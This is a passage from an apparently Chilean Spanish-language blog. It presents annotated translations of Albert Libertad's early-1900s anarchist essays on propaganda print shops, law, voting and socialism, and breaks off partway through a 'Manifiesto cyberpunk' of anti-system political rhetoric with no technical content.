Si hay dos tentativas, es porque las mismas causas producen los mismos efectos y porque la necesidad de un organismo de imprenta se hacía sentir en los medios anarquistas. Igual que las *Causeries*, también Girault había ya comenzado a reunir algo de material. No podría haber competencia en un trabajo anarquista, salvo la emulación de hacer lo más y mejor posible. ¿Adónde vamos? Si somos fuertes y obstinados en alcanzar el fin que nos hemos propuesto, triunfaremos poniendo el mayor método en nuestra actividad. No podría haber celos entre individuos. Puede haber, simplemente, divergencias en los fines o en los medios. Si tales tentativas no se fusionan, es que no hay afinidad entre ellas, es porque no tienen métodos paralelos. Hay que dejar, tanto a las agrupaciones como a los individuos, la forma de no servirse de la asociación más que cuando les convenga. Las ideas burguesas tienen millares de periódicos para hacerlas circular y, tan pronto aparecen dos imprentas que proponen la anarquía, ¿se habla de competencia? Harían falta centenares de ellas.

Ni los camaradas del *Bureau de propagande* ni los de las *Causeries populaires* se ocuparon al principio de lo que ocurría a su lado. Cuando las dos tentativas aparecieron, cada uno tuvo que examinar el proyecto del otro. No teniendo afinidad los individuos que se ocupaban de ambas y, sobre todo, siendo los métodos empleados absolutamente diferentes, comprendieron que no había posibilidad de fusión. Pero estoy convencido de que, en cada lado, han dejado un proyecto para adaptarse al otro, que convenía más a su temperamento, a sus desiderata o a la idea que se hacían de la propaganda. Esto es lo que resulta interesante.

Por mi parte, siempre he estado contra los medios libres fabricados antes de haber reunido los elementos, ensayado las afinidades. Lo que hacen los camaradas, en tal sentido, ¿estará bien? ¿estará mal? No lo sé. Creo que el método que siguen es malo; lo demostraba mediante la explicación del nuestro. Veremos los resultados.

Con el fin de que no haya malentendidos y para que los esfuerzos puedan dirigirse con conocimiento de causa, digamos que llamamos —en el periódico— a la tentativa de Girault y de Lorulot *Imprenta de la Librería Internacionalista* o de la *Oficina de Propaganda*, y aquella del que nosotros nos ocupamos, *Imprenta de las Causeries populaires*. Espero que los gruñones queden satisfechos.

Y que la actividad anarquista se multiplique, se desarrolle en todos los sentidos, pero que sea con el mayor método posible, pues no es el número de los esfuerzos el que obstaculiza la propaganda, son los esfuerzos malos y sin método.

[1] Abadía utópica descrita por Rabelais al final de su *Gargantúa*. Se trataba de un espléndido castillo destinado a la vida en común de jóvenes de ambos sexos, hermosos y ricos, que no habían de someterse más que a una sola regla, precisamente la que menciona Libertad: «Haz lo que quieras». Abadía de Thelema fue asimismo el nombre con el que Aleister Crowley bautizó a la comunidad mágica establecida en Céfalu (Sicilia) durante la década de los años veinte del siglo pasado.

[2] Semanario fundado por Libertad, que apareció todos los jueves entre el 13 de abril de 1905 y el 30 de julio de 1914 y del que están extraídos la mayor parte de los artículos de esta selección. Libertad publicaba en él bajo distintos seudónimos: Matar, le Baladeur (el Paseante), Rédan, Candide, le Grincheux (el Gruñón), Adamentos, L. A. Boirieux, etc. Tras su muerte (noviembre de 1908) asumirán sucesivamente la dirección del diario: Armandine Mahé, Jeanne Morand, Maurice Duflou y, finalmente, Lorulot, que lo instala en Romainville en el año 1910. Rirette Maitrejean y Víctor Kibalchich (el futuro Victor Serge), que asumen el cargo a partir del 13 de julio de 1911, llevan la publicación de vuelta a París en octubre de ese mismo año. Desde entonces, son Ernest Armand y Mauricíus quienes se ocupan de ella hasta su desaparición. En paralelo al semanario, *l’anarchie* publicó murales anti-electorales (*El ganado electoral* y *El Criminal*), carteles, tarjetas postales de propaganda. Además, y durante sus más de diez años de existencia, se dedicó a la edición y distribución de folletos y opúsculos anarquistas, cuyo listado completo puede encontrarse en http://cgecaf.com/mot.php3?id_mot=202 y en http://cgecaf.com/mot.php3?id_mot=203.

[3] Émile o Ernest Louis Girault, también apodado Angilleras o Angelleras (1871-1933). Obrero tipógrafo que fue anarquista y, más tarde, comunista. Colaboró en *L’Aurore* y también en *Le Libertaire*, donde defenderá una posición hostil al sindicalismo. En junio de 1904, participa en el Congreso Antimilitarista de Ámsterdam. Excelente orador, hizo multitud de giras dando conferencias —sobre todo, con Louise Michel, con quien estuvo en Argelia—. Sus discursos le valieron penas de prisión en diversas ocasiones.

[4] Georges André Roulot, conocido como André Lorulot (1885-1963). Propagandista anarco-individualista hasta 1914. En 1905 es arrestado durante ocho días por haber silbado al paso del coretejo del rey de España y despedido de la imprenta en la que trabajaba. Conoce, poco después, a Albert Libertad, con quien fundará *l’anarchie* y de cuya dirección se hará cargo tras el fallecimiento del primero. Al terminar la Gran Guerra, evoluciona hacia el comunismo.

50 comentarios

¡Abajo la ley!

Publicada el 22/09/2018 - 13/03/2022 por Anonymous Chile

«Los anarquistas encuentran *coherentes con sus ideas* las del señor La Rochefoucauld y las de todos aquellos que protestaron sin preocuparse por la legalidad», nos dice Anna Mahé.[1] Esto no es, evidentemente, exacto, tal como voy a demostrar. Basta con una palabra para disfrazar el sentido de una frase; también las cuatro palabras subrayadas han bastado para cambiar enteramente el sentido de la que cito.

Si Anna Mahé fuese líder de un gran periódico, se apresuraría a acusar de la pifia a los tipógrafos o al correcto y todo quedaría de lo mejor en el mejor de los mundos posibles. O bien, por otro lado, creería empecinarse con toda seriedad en una idea que no sería manifestación de su razonamiento, sino más bien el resultado de escribir a vuelapluma. Anna piensa, pero con, que es necesario, sobre todo en estos artículos de cabecera el menor número de errores posible y señalarlos nosotros mismos cada vez que nos sea dado apercibirlos.

Los católicos, los socialistas, todos aquellos que aceptan, en un momento dado, el sistema de voto no son *coherentes con sus ideas* cuando se rebelan contra las consecuencias de una ley, cuando se manifiestan contra sus agentes, sus representantes. Solo los anarquistas están autorizados, son *coherentes con sus ideas* cuando actúan contra la ley.

Cuando un hombre deposita su papeleta de voto en la urna no emplea medio alguno de persuasión proveniente del libre examen o de la experiencia. Lleva a cabo la operación mecánica de contar a aquellos que están dispuestos a elegir a los mismos delegados que él, a hacer, en consecuencia, las mismas leyes, a establecer los mismos reglamentos que deberán sufrir todos los hombres. Al introducir su papeleta dice: «Me confío al azar. El nombre que salga de esta urna será el de mi legislador. Puede que esté del lado de la mayoría, pero corro también el riesgo de estar del de la minoría. Tanto mejor o tanto peor».

Después de haberse puesto de acuerdo con los demás hombres, de haber decidido que se someterían los unos y los otros al juicio mecánico del número, hay, por parte de los que están en minoría, cuando estos no aceptan las leyes y reglamentos de la mayoría, como una trapacería de mal jugador, de esos que, desde luego, quieren ganar pero no perder.

Los católicos que decidieron, cuando se encontraban en mayoría, las leyes de excepción de 1893-1894, carecen de motivos para rebelarse cuando, en el seno de la mayoría, se deciden las leyes de Separación. Los socialistas que quieren decidir, estando en mayoría, las leyes sobre la jubilación de los obreros carecen de motivos para rebelarse contra la misma mayoría cuando esta aprueba alguna ley que contraría, poco o mucho, sus intereses. Ningún partido de los que aceptan el sufragio, por muy universal que este sea, como base de sus medios de acción, puede rebelarse en tanto se le deje el medio de afirmarse mediante la papeleta del voto.

Los católicos se encuentran en general, en dicha situación. Los señores en tela de juicio durante las últimas batallas eran muy «grandes electores», y algunos incluso parlamentarios; no solo los unos habían votado e intentado formar la mayoría en las Cámaras que preparan las leyes, sino que los otros habían elaborado dicha ley, y discutido sus términos y artículos. Siendo, pues, parlamentaristas y voteros, los católicos no son *coherentes con sus ideas* cuando se rebelan. Los socialistas tampoco lo son más. Hablan constantemente de revolución social y se eternizan en gestos pueriles de votación, a la perpetua busca de una mayoría legal. Aceptar ayer la tutela de la ley, rechazarla hoy, retomarla mañana: he aquí el modo de obrar de los católicos, de los socialistas, de los parlamentaristas en general. Es ilógico.

Cada una de sus actitudes no se encuentra en relación lógica con la de la víspera, del mismo modo que la de mañana no lo estará con la de hoy. O se acepta la ley de las mayorías o no se acepta. Aquellos que la inscriben en su programa y que persiguen lograr la mayoría son ilógicos cuando se resisten a ella.

Así es. Pero, cada vez que los católicos, los socialistas se rebelan, no indagamos en los actos de la víspera, no nos ocupamos de los que se realizarán mañana; contemplamos tranquilamente cómo rompen la ley aquellos que son sus propios fabricantes. Será cosa nuestra hacer que esos días no tengan un mañana.

Así pue, los anarquistas son los únicos lógicos al rebelarse. Los anarquistas no votan. No quieren ser la mayoría que manda, no aceptan ser la mayoría que obedece. Cuando se rebelan, no tienen necesidad de romper ningún contrato; jamás aceptan vincular su individualidad a gobierno alguno.

Solo ellos, pues, son rebeldes que no mantienen ningún vínculo, y cada uno de sus gestos violentos está en relación con sus ideas, es coherente con su razonamiento.

Por la demostración, por la observación, por la experiencia o, la falta de todas ellas, por la fuerza, por la violencia: he aquí los medios por los que quieren imponerse los anarquistas. Por la mayoría, por la ley, ¡jamás!

[1] Anna Mahé (1881-1960). Ex institutriz y propagandista ácrata que fue compañera de Libertad a partir de la fundación del grupo de las *Causeries populaires* en 1902. Más en Anne Steiner, *Las militantes anarquistas individualistas: mujeres libres en la Belle Époque* (2008). Edición digital en https://colaboratorio1.wordpress.com.

1 comentario

Socialismo y anarquismo

Publicada el 22/09/2018 - 14/03/2022 por Anonymous Chile

Ciertas ideas flotan en la atmósfera en determinadas épocas. Por todos lados —como si tal trabajo se hiciera de común acuerdo— se plantean ciertos problemas. Dichas cuestiones se presentan de forma precisa en tal medio, de forma borrosa en tal otro, pero en todos ellos solicitan la atención de los hombres que piensan.

Los camaradas recordarán la apasionante discusión que provocó en *Le Libertaire* y en las *Causeries populaires* la idea de la constitución de un partido libertario, el cual enviaría representantes al Parlamento. Representans de la oposición, como va de suyo. Y apenas acabábamos de salir de una discusión sobre sindicalismo y política, partido del Trabajo y partido libertario.[1] Aún vemos empeñados en esta batalla a Paraf-Javal y Georges Paul,[2] a Niel[3] y Malato.[4] Para los *leaders* de la discusión, los argumentos recíprocos no resultaron convincentes, y cada uno se mantuvo en su terreno […]. Las últimas elecciones han hecho revivir la cuestión del partido libertario, del partido de concentración revolucionaria.

Algunos han llorado moderadamente para sus adentros la decepción de no ver la palabra anarquista resonar en la tribuna del Palacio Borbón.[5] Otros daban incluso por supuesto que, de buena gana, habrían aceptado sacrificarse por la causa. De nuevo, vuelta a empezar… ¿Se tratará también de la misma aceptación?

La influencia del medio, las corrientes populares penetran incluso entre los anarquistas. Estos han oído hablar por todos lados de victoria de la democracia, de república, de partidos progresistas. De ahí llegan a dar por descontado el triunfo legal de la anarquía… Y, puesto que la anarquía es un poco demasiado dura para atravesar la grieta parlamentaria, tan solo se desliza por ella el pequeño engendro del libertarismo.

Si Guesde, pontificando en los cafetines del norte; Gérault-Richard,[6] zascandileando en los cabarés de Montmartre; Coutant,[7] perorando en las tabernas de mala muerte de los alrededores de París; y Jaurès, charloteando en los cafés meridoniales, pusieron sus esperanzas en que su verbo resonase desde lo alto de las tribunas parlamentarias y sus interrupciones salpimentaran las sesiones legislativas, no extrañará que también entre nosotros haya muchachos incomprendidos que no pidan más que manifestar su valía.

A menudo he pensado que la idiotez general de los contemporáneos y la imbecilidad cobarde de los camaradas nos permitirían colocarnos en algún escalafón oficial. He entrevisto el gesto y el ruido entrecortado de mis zurriagazos dominar a la turba de diputados mejor que los débiles timbrazos presidenciales. Tras esta humilde confesión, mostraremos todo el absurdo, todo el peligro que encierra dejar caer al anarquismo, bajo el pretexto que sea, en la trampa del parlamentarismo.

Por todos los medios se intenta lograr dicha caída. Tanto los medios más sinceros como los más pérfidos ofrecen diferentes argumentos. Para empezar, se establece un acuerdo con los socialistas, dejando al margen la cuestión del voto y del parlamentarismo. Marcharíamos junto a los socialistas ultra-revolucionarios, los sindicalistas de la acción directa; nos uniríamos en una lucha común. Ya se bosqueja el plan de un diario basado en una idea de concentración revolucionaria. Los elementos se asocian en él de forma barroca.

Aquí mismo, Ludovic Bertrand ha hablado de un acuerdo con los socialistas, descuidando la táctica parlamentaria. Marcharíamos de la mano hasta una determinada encrucijada. Otros se esfuerzan por mostrar que los anarquistas no son más que socialistas. Quieren escamotear el sentido actual de la palabra «socialismo» bajo su sentido en el pasado.

Sí, somos socialistas porque tenemos un pensamiento social, porque nos preocupamos por los problemas sociales: socialistas-anarquistas. Pero, para decirlo con menos palabras, somos anarquistas. No somos nosotros los que rechazamos el término; son ciertos individuos, cierto partido, los que abusan de él: los socialistas, el partido socialista.

Este último se ha complacido en hacer, de un apelativo general, un apelativo particular.

Si el socialismo ha de significar la doctrina del señor Jaurès o del señor Guesde, el allemanismo[8] o el broussismo,[9] que no se nos busque en él. Podemos ocupar un espacio legal. El anarquismo y el estatismo podrán situarse el uno al lado del otro. Pero ¿acaso quiere esto decir que no se combatirán igualmente?

Nuestro individualismo, nuestro comunismo no tienen nada en común con el estatismo, con el colectivismo allemano-guesdo-broussista. Algo de lo que no se habla lo suficiente y que separa por completo a los anarquistas de los socialistas es el hecho de que la doctrina de los segundos no es más que un conjunto de programas políticos, en tanto que la de los primeros comporta toda una enseñanza filosófica.

El socialismo —en el sentido relativo de la palabra— resulta incompleto al lado del anarquismo. El programa del socialismo toma al elector y carga con él entre sus derechos y deberes políticos. La filosofía del anarquismo toma al individuo desde la cuna y lo acompaña hasta el horno crematorio.

El anarquismo concierne al individuo, no solo frente a la colectividad, sino frente a sí mismo. El anarquismo no se dirige al ciudadano, sino al hombre. Lo para a las puertas de los cabarés, de los colegios electorales, de los burdeles o de los cuarteles, de las iglesias o de los fumaderos de opio. Lo conduce al terreno de la ciencia, del libre examen, de la observación.

Mientras que el socialismo de Guesde puede hacer buenas migas con el catolicismo, mientras que el socialismo de Bebel[10] se reconoce en el patriotismo más puro, mientras que el socialismo de Viviani,[11] de Briand[12] o de Millerand[13] se conchaba con los «mejores jueces», el anarquismo auténtico destruye los tribunales, los panteones y las catedrales que la idea de justicia, la idea de patria y la idea de Dios construyen en el cerebro de los hombres.

Puede lamentarse, en ocasiones, que nuestra elección, nuestra opinión, no salten al rostro de la opinión general, junto a la de los líderes del radicalismo o del socialismo.

El día en que nuestra idea esté lo bastante generalizada como para llevar a algunos de los nuestros al Parlamento, tendremos cosas mejores que hacer que ir a pontificar en él. Seremos los suficientes en número como para lanzar el libro o el folleto a todas las manos, como para hablar en todos los medios sin imponernos la palinodia de la elección y la mentira del voto.

Ya ahora, la minoría que formamos hace vibrar las cuerdas del espíritu del pueblo más poderosamente que el partido socialista unificado o independiente. Nuestros folletos se distribuyen por millares. La biblioteca socialista no puede competir con la biblioteca anarquista. El socialismo no tiene equivalentes a los folletos de un Kropotkin, de un Reclus, de un Paraf-Javal, de un Grave,[14] de un Nieuwenhuis o de un Malatesta. Nuestros folletos están por todos lados, penetran en cualquier lugar.[15]

No es el Palacio Borbón o el de Luxemburgo[16] lo que necesitan sus sanas y fuertes ideas, sino hombres que las piensen, las escriban, las divulguen. Las ideas, arrojadas desde una tribuna legislativa, toman una forma legal que disminuye toda su fuerza. Pasan bajo la mirada de la censura gubernamental.

Las ideas anarquistas no toman su fuerza, su «autoridad», del lugar desde donde se lanzan, sino de su propio valor. Solo los partidos decadentes tienen necesidad de la autoridad del voto y del número. El anarquismo está demasiado vivo. […]

[1] Sobre este debate: Émile Pouget, *La Confédération générale du travail*, seguido de *Le Parti du Travail*, introducción de Jacques Toublet, Editions CNT-RP, 1997.

[2] Jardinero y militante anarquista. Fue, desde 1907 hasta 1913, secretario de la Bolsa de Trabajó de Ivry. En 1908 fue candidato al puesto de secretario adjunto de la CGT, sección Bolsas, contra Desplanques, que fue elegido adjunto de Georges Yvetot (1868-1942).

[3] Louis Niel (1872-1952). Camarero y, más tarde, tipógrafo. Fue Secretario general de la CGT. En torno a 1906 evoluciona hacia el reformismo. Durante el Congreso de Amiens, defiende, frente a anarquistas y guesdistas, la independencia del movimiento obrero, exaltando la primacía de la acción sindical.

[4] Charles Malato (1857-1938). Militante anarquista, escritor, publicista y francmasón. Fue autor, entre otras obras, de *La filosofía de la Anarquía* (1889) y de *Revolución Cristiana y Revolución Social* (1891). Deportado junto con su padre, defensor de la Comuna de París, a Nueva Caledonia en 1874, poco después de su retorno a Francia, funda la Liga Cosmopolita, en cuyo seno defiende el ilegalismo. Será condenado a quince meses de prisión por «incitación al asesinato, pillaje e incendio». Durante el asunto Dreyfus, colabora en el *Journal du Peuple* de Sébastien Faure y forma parte del comité revolucionario de coalición encargado de responder a las manifestaciones nacionalistas. En 1905 y debido a su cercanía a Francisco Ferrer, se le imputa la participación en el atentado contra Alfonso XIII; saldrá absuelto. Su explícito apoyo a los aliado con el estallido de la Primera Guerra Mundial y su firma del *Manifiesto de los 16* causará una gran polémica en los medios anarquistas.

[5] *Palais Bourbon*, esto es, la Asamblea Nacional francesa.

[6] Gérault-Richard había conocido cierta fortuna, en sus años mozos, como intérprete de canciones de inspiración campesina y socialista en las tabernas y cabarés del barrio parisino de Monmartre.

[7] Jules Coutant (1854-1913). Obrero, militante socialista (de tendencia blanquista a partir de 1895) y diputado por el Sena. En 1905 se adhirió a la SFIO (*Section française de l’Internationale ouvrière*; en 1969, se transformó en el Partido Socialista Francés), aunque la abandonó poco después por no poder soportar la disciplina de partido. Fue reelegido en su circunscripción como republicano-socialista en 1910.

[8] De Jean Allemane (1843-1935). Tras ser excluido del Partido Obrero de Jules Guesde en el Congreso de Châtellerault (1890), funda su propia organización: el POSR (Partido Obrero Socialista Revolucionario), que preconiza la huelga general como medio de acción revolucionaria. Aunque ideológicamente cercanos al anarcosindicalismo, en la práctica, los allemanistas perseguirán siempre la unidad con otros miembros de la familia socialista y su presencia en las instituciones políticas burguesas. De hecho, en 1902, el POSR se fusionará con los socialistas independientes y la FTSF (Federación de los Trabajadores Socialistas de Francia) de Paul Brousse para crear el PSF (Partido Socialista Francia), que tendrá como portavoz a Jean Jaurès.

[9] De Paul Brousse (1844-1912). Médico y militante anarquista de primera hora, se convertirá al socialismo en la década de 1880. Representante de un socialismo no marxista (o incluso anti-marxista), Brousse considerará posible el advenimiento de un régimen socialista mediante reformas progresivas, tanto en el ámbito nacional (mediante leyes) como en el municipio (a través de la descentralización), centradas fundamentalmente en los servicios públicos. Su reformismo será conocido como *broussismo* o *posibilismo*.

[10] Auguste Bebel (1840-1913). Fue uno de los fundadores del Partido Socialdemócrata Alemán (SPD) y director de la publicación socialista *Vorwärts*. Entre sus obras se encuentran *La guerra de los campesinos en Alemania* (1876), *La mujer y el socialismo* (1883), *Charles Fourier* (1888) y *Mi vida* (1910).

[11] René Raphaël Viviani (1863-1925). Fundó el Partido Republicano Socialista en el año 1910. Fue Ministro de Instrucción pública entre 1913 y 1914 y Presidente del Consejo desde el 13 de junio de este último año hasta el 29 de octubre de 1915.

[12] Aristide Briand (1862-1932). Pasó de posiciones cercanas al sindicalismo revolucionario, en su juventud, a la defensa de un socialismo de tonalidades más suaves, cuya expresión organizativa fue la creación de una efímera *Fédération des gauches* en el año 1914. Ocupó diversas carteras ministeriales y la Presidencia del Consejo en varias ocasiones. En 1926 recibió el Premio Nobel de la Paz (junto a Gustav Stresemann) por su labor en pro de la reconciliación entre Francia y Alemania (Acuerdos de Locarno).

[13] Étienne Alexandre Millerand (1859-1943). Como Briand, abandonó su inicial militancia izquierdista para irse escorando paulatinamente hacia la derecha. También estuvo implicado en la fundación de la *Fédération des gauches* y, más tarde, en la creación de la *Ligue républicaine national*. Fue el primer socialista que formó parte de un gobierno francés; entre el 29 de septiembre de 1920 y el 11 de junio de 1924, ocupó la Presidencia de la República.

[14] Jean Grave (1854-1939). Militante y teórico anarquista francés. Fue fundador de la revista *Les Temps Nouveaux*, que acogió, entre otras, las firmas de Élisée Reclus y Kropotkin. Se convirtió en divulgador de las tesis de este último con *La société mourante et l’anarchie* (1892). Escribió *Las aventuras de Nono*, una utopía libertaria para niños, que, tras su traducción al castellano por Anselmo Lorenzo, sería utilizado como libro de texto en la Escuela Moderna de Ferrer i Guardia. Fue, por cierto, Grave, adversario de la corriente anarco-individualista dentro del movimiento libertario, el que hizo correr la voz de que Libertad era, en realidad, un confidente de la policía.

[15] Ferdinand Domela Nieuwenhuis (1846-1919). Pastor luterano convertido al socialismo y, más tarde, al anarquismo. Fue el primer socialista que ocupó un escaño en el parlamento holandés. Estuvo también entre los organizadores del Congreso Antimilitarista de Ámsterdam de junio de 1904. Fue un ardiente propagandista de la huelga general en caso de conflicto, pero se opuso a una organización anarquista estructurada y se mostró muy crítico frente al anarcosindicalismo.

[16] Sede del Senado en Francia.

67 comentarios

Manifiesto cyberpunk

Publicada el 22/09/2018 por Anonymous Chile

MANIFIESTO CYBERPUNK

Somos las mentes electrónicas, un grupo de rebeldes con pensamientos libres, cyberpunks.
Vivimos en el ciberespacio, estamos en todos los lugares y en ninguno al mismo tiempo, no tenemos límites, jerarquías, leyes ni líderes.
Este es nuestro manifiesto, el manifiesto cyberpunk.

I.Cyberpunk

Esos somos nosotros, lo diferente. Ratas de la tecnología, nadando en el océano de la información. Estamos cohibidos, pequeños chicos de colegio, sentados en el último pupitre, en la esquina de la clase. Somos el adolescente que todos consideran extraño, estamos estudiando infectar redes informáticas y hackear sistemas operativos, explorando la profundidad de su extremos. Nos criamos en el parque, sentados en un banco, con un ordenador portátil apoyado en las rodillas, programando la última realidad virtual. Lo nuestro está en el garaje, apilado con la porquería electrónica, el hierro soldado en la esquina de la mesa, cercana a la radio desmontada y detrás de los televisores desarmados. Eso es lo nuestro, una habitación con ordenadores, impresoras zumbeantes, enrutadores de red y módems funcionando todo el tiempo. Somos aquellos que vemos la realidad de forma distinta, nuestro punto de vista muestra más de lo que la gente ordinaria puede ver, aquello que todos ignoran, el lugar al que nadie quiere mirar. Ellos solo ven lo exterior, pero nosotros vemos lo interior. Eso es lo que somos, realistas con gafas de soñadores. Somos aquellas personas casi desconocidas en el vecindario, personas entregadas a sus propios pensamientos, sentadas día tras día ante el ordenador, saqueando la red por algo. No salimos muy frecuentemente, solo a veces para ir a la universidad, a trabajar reparando algunas cosas, a comprar porquerías en la tienda de la esquina… o simplemente para dar un paseo y respirar algo del poco aire puro que aún existe y sobrevive en el planeta. No tenemos muchos amigos, sólo unos pocos conocidos de Internet y con los cuales nos reunimos en determinadas ocasiones en el domicilio de alguien y nunca públicamente. Todos los demás que conocemos están en la red, en el otro lado de la línea. Los conocemos de nuestros foros, blogs, canales favoritos de Internet y redes que frecuentamos. Nosotros somos aquellos a los que les importa una mierda lo que los demás piensen de ellos, no nos interesa lo que aparentamos o lo que la gente diga o piense sobre nosotros. La mayoría de nosotros viven escondidos, ocultos en algún callejón, siendo desconocidos para todos, excepto para aquellos que realmente consideramos relevantes y con los que necesitamos mantener un contacto constante y permanente. Otros aman la popularidad, ellos aman la fama. Ellos son conocidos en su mundo populista de celebridades en donde pueden ganar mucho dinero exhibiéndose, exponiéndose, vendiendo su dignidad y monopolizando los derechos humanos a fin de convertirlos en un negocio de beneficio propio. Sus nombres se escuchan con facilidad allí. Pero todos unidos somos una sola fuerza marchando, una sola energía en movimiento, una ideología o conjunto de muchas ideas diferentes combatiendo, nosotros somos los cyberpunks.

La sociedad no nos entiende, somos los «raros», los «dementes» y los «locos», ¿sólo por ser más introvertidos, retraídos y pensar distinto a los demás? Somos personas fuera del radar del sistema, somos seres externos a todo el fanatismo, manipulación y control de los gobiernos, fuera de la vista de la gente normal que vive lejos de la información, y cuyo cerebro está tan contaminado por las cotidianidades de la vida y su percepción y mentalidad se encuentran tan manipuladas por las empresas, que han perdido la capacidad para comprender las ideas libres. La sociedad se burla y rechaza nuestra manera de pensar, comunidades obscuras y ocultas viviendo, pensando y respirando de una única manera, creando su propio tópico. Ellos nos desprecian porque pensamos de forma libre, y el pensamiento libre está prohibido, es un crimen, acto de vandalismo y terrorismo juvenil que debe ser erradicado y suprimido. El cyberpunk tiene una apariencia externa, carece de jerarquías, leyes, normas, reglas y líderes. Los cyberpunks son personas que comienzan desde lo normal y saben lo mismo que ya todos conocen, desde el vagabundo más insignificante hasta el multimillonario más poderoso, pero lo miran con otros ojos, tienen otra percepción, un raciocinio analítico muy particular, una forma de ver, comprender, ser y pensar muy distinta y con ello se permiten modificarlo todo hasta conocer su interior, su funcionamiento, sus por qué, cómo y cuándo a fin de darles otros usos muy diferentes a los predeterminados por defecto. El cyberpunk ya no es un genero de literatura, tampoco es una ordinaria subcultura. El cyberpunk es en si mismo una nueva orden, un nuevo movimiento dirigido por padres e hij@s de una nueva «ciber-era». Una cultura que une todos nuestro intereses comunes. Nosotros estamos unidos, somos uno, una sola fuerza en constante movimiento, una energía luchando por uno o muchos objetivos, algunos compartidos de forma colectiva y otros privados. Nosotros somos los cyberpunks.

II. Sociedad

La sociedad que nos rodea está atascada en el conservadurismo y en el «todo para unos pocos, las élites más poderosas», mientras se hunde lentamente en las arenas movedizas del tiempo. Sin embargo, algunos obstinados rehúsan a creer esto, lo obvio es que vivimos en una sociedad podrida, las llamadas reformas que nuestros gobiernos utilizan para enorgullecerse no son más que un invento, una pantalla, un engaño, una sucia y asquerosa mentira, otra manipulación en la lista que a fin de cuentas, aunque de forma muy subliminal, sutíl, oculta y maliciosa, sólo satisface a unos pocos. La gente teme a lo extraño y a lo desconocido. Ellos prefieren lo autentificado y verificado por los gobiernos y empresas, aquello que está controlado, espiado y vigilado, aquello que es popular y aceptado por todos. Ellos temen a lo que lo extraño y desconocido pueda acaecerles o acarrearles, ellos temen perder lo que ya tienen. Su temor es tan fuerte que esto es proclamado enemigo revolucionario, una idea liberal a mano armada, una amenaza, un acto de terrorismo, vandalismo y un peligro público para la sociedad porque el sistema les dice que es peligroso. Para ello, las personas podrían ignorar la vigilancia y manipulación gubernamental, dejarla a un lado, seguir adelante y hacer su propia vida lejos de las garras del gobierno. Ellos están atemorizados, se mantienen constantemente bajo el control del dinero y mantienen sus vidas en un constante terror infundado por el sistema en el sentido de que lo poco que ahora tienen podrá multiplicarse en el mañana. Todo lo que ellos deben hacer es cerrar sus puños y sentir lo extraño y desconocido como puro, suyo y propio, dando así libertad a los pensamientos, ideas y a las palabras. Durante siglos, las nuevas generaciones han sido adoctrinadas de una misma manera porque los ideales son la vulnerabilidad que todos buscan, los ideales son el tesoro del cual todos desean apropiarse a fin de controlarlo, monitorizarlo y manipularlo. Se olvida la individualidad, la gente piensa de una misma forma, siguiendo un modelo impuesto y determinado en ellos desde su juventud por parte de la así llamada «educación» para todos los niños y, cuando alguno se atreve desafiar la autoridad, es castigado. Nuestra sociedad está enferma y necesita ser curada y una buena opción es eliminar al sistema, destruir toda forma de empresa, quitar cualquier modo de capital privado y hacer de sus recursos algo libre, colectivo y compartido por todos y a lo cual todos puedan acceder de forma fácil, sencilla, igualitaria y equitativa sin monopolio alguno ni tener que pagar nada por ello.

III. El Sistema

El sistema, con siglos de antigüedad, basado en principios que no son validos actualmente. Un sistema que no ha cambiado mucho desde su nacimiento y que ahora está equivocado puesto que es incompatible con las formas de vivir, ser y pensar de la raza humana avanzada en tiempos modernos. El Sistema necesita imponer su verdad sobre la nuestra para poder mandar y los gobiernos necesitan que nosotros les sigamos ciegamente en todo y a cada una de sus manipulaciones, engaños y mentiras. Por esta razón, vivimos en un eclipse informativo. Cuando las personas adquieren más información de la inculcada y adoctrinada por el gobierno, no pueden distinguir cuál es correcta y cuál no. En consecuencia, la mentira se hace verdad, una verdad fundamental para todo lo demás. De ese modo los líderes controlan con mentiras a la gente ordinaria que carecen de la noción de cual es la verdad y ciegamente siguen al gobierno, creyéndoles como lo único verdadero y real. Nosotros luchamos para liberar la información, nosotros combatimos por la libertad de prensa, de conocimiento y expresión. Por la libertad de manifestar nuestros pensamientos, ideas y opiniones libremente sin ser perseguidos por el sistema. Incluso en los países más democráticos y desarrollados que pretenden ser la cuna de la libertad de expresión. La desinformación, la mentalidad controlada y la prensa manipulada es una de las principales armas del sistema y esta es un arma que ellos dominan muy bien. La red es la que nos ayuda a expandir nuestros pensamientos libremente, la red sin barreras ni limites de información. Lo nuestro es tuyo, lo tuyo es nuestro. Todo el mundo tiene el derecho a compartir la información, investigar por ella y adquirir conocimiento nuevo, jugoso y sabroso sin restricciones. El cifrado de información es nuestra arma ya que sólo así las palabras de la revolución pueden expandirse ininterrumpidamente, y el gobierno sólo puede intentar adivinar mientras nosotros le observamos desde las obscuridades de la Internet y sonreímos. La red es nuestra esencia, nuestro medio, nuestra herramienta y en la red somos los reyes donde podemos ejercer cada uno como su propio líder y crear sus propias reglas y leyes. El mundo está cambiando, pero las leyes son las mismas. El sistema no está cambiando, sólo unos pocos rasgos para revestirse a los nuevos tiempos, pero en el fondo es todo lo mismo. Nosotros en la internet hacemos y creamos nuevas leyes al igual como hacemos y creamos código. Leyes, que se ajusten a los tiempos en los que vivimos, con el mundo que nos rodea y que defienden la justicia, los derechos civiles, la libertad, el anonimato y la privacidad. No leyes construidas en las bases del pasado, no leyes que sólo se refieren a unos pocos y defienden los intereses del más grande y poderoso, sino que son leyes para hoy, leyes que se ajusten al mañana y nos protejan como seres humanos.

IV. La visión

A algunas personas no les importa lo que sucede en el mundo, a ellos les preocupa lo que suceda a su alrededor, en su «micro-universo». Estas personas sólo pueden ver un futuro obscuro, porque ellos sólo ven la vida de ellos mismos en el aquí y ahora. Otras personas se muestran más concienciadas en lo que ocurra globalmente, ellos están interesados en todo, en la perspectiva del futuro, en lo que va a pasar en el mundo. Estos últimos suelen tener una actitud más optimista; para ellos el futuro puede ser limpio y el mundo es más bonito, ya que son capaces de ver en esto a una raza humana más madura en un mundo más amplio, o al menos eso es lo que ellos piensan. Nosotros estamos en el medio, nos interesa lo que ocurre ahora, en el futuro de la raza humana, el planeta tierra y en lo que puede suceder más adelante. Para ello, coincidimos que la Internet es y será un punto de quiebre y fluctuación fundamental, algo esencial y que moverá al mundo y de lo cual indiscutible e incuestionablemente dependerán los hombres y mujeres del mañana. En consecuencia de ello, observamos la red y acordamos efectivamente que hace ya muchos años que está creciendo y haciéndose a cada segundo más amplia de una forma descontrolada. Pronto todo en este mundo será absorbido por la red, e inclusive, será por ley. Desde los sistemas militares, todas las empresas, entidades, organizaciones y gobiernos hasta la computadora personal de nuestro domicilio o centro de trabajo. Pero la red es el nuevo hogar de la anarquía y por ello no puede 